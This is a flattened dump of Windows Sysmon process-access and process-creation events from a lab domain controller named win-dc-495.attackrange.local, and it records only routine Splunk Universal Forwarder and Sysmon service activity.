13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8ED6-6005-9600-00000000A301}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8ED6-6005-9600-00000000A301}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.807{59A5CD1D-8ED6-6005-9600-00000000A301}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.807{59A5CD1D-8ED7-6005-9700-00000000A301}35003508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8ED7-6005-9700-00000000A301}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8ED7-6005-9700-00000000A301}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8ED7-6005-9700-00000000A301}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.667{59A5CD1D-8ED7-6005-9700-00000000A301}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8ED8-6005-9800-00000000A301}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 